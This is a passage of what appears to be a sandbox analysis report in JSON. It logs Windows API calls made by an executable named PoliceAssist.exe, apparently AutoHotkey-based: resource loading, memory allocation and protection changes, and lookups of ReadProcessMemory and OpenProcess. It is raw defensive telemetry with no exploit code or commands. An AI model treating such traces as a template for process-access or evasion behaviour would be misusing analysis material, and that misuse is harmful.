                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 106
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x140020837",
            "parentcaller": "0x1400201a7",
            "category": "misc",
            "api": "SizeofResource",
            "status": true,
            "return": "0x0000301f",
            "arguments": [
              {
                "name": "ModuleHandle",
                "value": "0x00000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x1401313b0"
              }
            ],
            "repeated": 0,
            "id": 107
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14002084e",
            "parentcaller": "0x1400201a7",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140136168",
            "arguments": [
              {
                "name": "Module",
                "value": "0x00000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x1401313b0"
              }
            ],
            "repeated": 0,
            "id": 108
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400aa8e0",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054c7000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 109
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400111be",
            "parentcaller": "0x140010c92",
            "category": "misc",
            "api": "GetKeyboardLayout",
            "status": true,
            "return": "0x04090409",
            "arguments": [
              {
                "name": "KeyboardLayout",
                "value": "0x00000409"
              },
              {
                "name": "LanguageName",
                "value": "English (United States)"
              }
            ],
            "repeated": 12,
            "id": 110
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400aa4ba",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05362000"
              },
              {
                "name": "RegionSize",
                "value": "0x00011000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 111
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbba6",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054ca000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 112
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006bd5a",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "user32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              }
            ],
            "repeated": 0,
            "id": 113
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006bd6e",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "kernel32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1660000"
              }
            ],
            "repeated": 0,
            "id": 114
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006bd82",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "comctl32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              }
            ],
            "repeated": 0,
            "id": 115
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006bd96",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "gdi32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1850000"
              }
            ],
            "repeated": 0,
            "id": 116
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006be38",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": false,
            "return": "0xffffffffc0000139",
            "pretty_return": "ENTRYPOINT_NOT_FOUND",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "USER32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              },
              {
                "name": "FunctionName",
                "value": "ReadProcessMemory"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 117
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006be38",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNEL32.DLL"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1660000"
              },
              {
                "name": "FunctionName",
                "value": "ReadProcessMemory"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee167c800"
              }
            ],
            "repeated": 0,
            "id": 118
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006be38",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": false,
            "return": "0xffffffffc0000139",
            "pretty_return": "ENTRYPOINT_NOT_FOUND",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "USER32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              },
              {
                "name": "FunctionName",
                "value": "CloseHandle"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 119
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006be38",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNEL32.DLL"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1660000"
              },
              {
                "name": "FunctionName",
                "value": "CloseHandle"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee1684bf0"
              }
            ],
            "repeated": 0,
            "id": 120
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006be38",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": false,
            "return": "0xffffffffc0000139",
            "pretty_return": "ENTRYPOINT_NOT_FOUND",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "USER32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              },
              {
                "name": "FunctionName",
                "value": "OpenProcess"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 121
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14006be38",
            "parentcaller": "0x1400317fe",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNEL32.DLL"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1660000"
              },
              {
                "name": "FunctionName",
                "value": "OpenProcess"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee167b0f0"
              }
            ],
            "repeated": 0,
            "id": 122
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x140020668",
            "parentcaller": "0x1400053b0",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 123
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x140005722",
            "parentcaller": "0x1400053c5",
            "category": "windows",
            "api": "FindWindowW",
            "status": false,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ClassName",
                "value": "AutoHotkey"
              },
              {
                "name": "WindowName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              }
            ],
            "repeated": 0,
            "id": 124
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af45e",
            "parentcaller": "0x14001f01c",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x1401313c0",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#14"
              },
              {
                "name": "Name",
                "value": "#159"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 125
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af473",
            "parentcaller": "0x14001f01c",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140139188",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x1401313c0"
              }
            ],
            "repeated": 0,
            "id": 126
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af51b",
            "parentcaller": "0x14001f01c",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x140131320",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#3"
              },
              {
                "name": "Name",
                "value": "#2"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 127
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af52f",
            "parentcaller": "0x14001f01c",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140132500",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x140131320"
              }
            ],
            "repeated": 0,
            "id": 128
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af551",
            "parentcaller": "0x14001f01c",
            "category": "misc",
            "api": "SizeofResource",
            "status": true,
            "return": "0x000025a8",
            "arguments": [
              {
                "name": "ModuleHandle",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x140131320"
              }
            ],
            "repeated": 0,
            "id": 129
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 130
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 131
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 132
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 133
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 134
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 135
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 136
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 137
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1879000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 138
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af574",
            "parentcaller": "0x14001f01c",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1879000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 139
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af45e",
            "parentcaller": "0x14001f045",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x1401313c0",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#14"
              },
              {
                "name": "Name",
                "value": "#159"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 140
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af473",
            "parentcaller": "0x14001f045",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140139188",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x1401313c0"
              }
            ],
            "repeated": 0,
            "id": 141
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af51b",
            "parentcaller": "0x14001f045",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x140131310",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#3"
              },
              {
                "name": "Name",
                "value": "#1"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 142
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af52f",
            "parentcaller": "0x14001f045",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140131458",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x140131310"
              }
            ],
            "repeated": 0,
            "id": 143
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400af551",
            "parentcaller": "0x14001f045",
            "category": "misc",
            "api": "SizeofResource",
            "status": true,
            "return": "0x000010a8",
            "arguments": [
              {
                "name": "ModuleHandle",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x140131310"
              }
            ],
            "repeated": 0,
            "id": 144
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x140131380",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#4"
              },
              {
                "name": "Name",
                "value": "#211"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 145
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140135d70",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x140131380"
              }
            ],
            "repeated": 0,
            "id": 146
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 147
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtOpenSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000244"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "MSCTF.dll"
              }
            ],
            "repeated": 0,
            "id": 148
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000244"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee21a0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00114000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 149
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee22b0000"
              },
              {
                "name": "ModuleName",
                "value": "MSCTF.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 150
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee227b000"
              },
              {
                "name": "ModuleName",
                "value": "MSCTF.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00002000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 151
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000244"
              }
            ],
            "repeated": 0,
            "id": 152
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee227b000"
              },
              {
                "name": "ModuleName",
                "value": "MSCTF.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00002000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 153
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001f198",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "35"
              },
              {
                "name": "ProcessInformation",
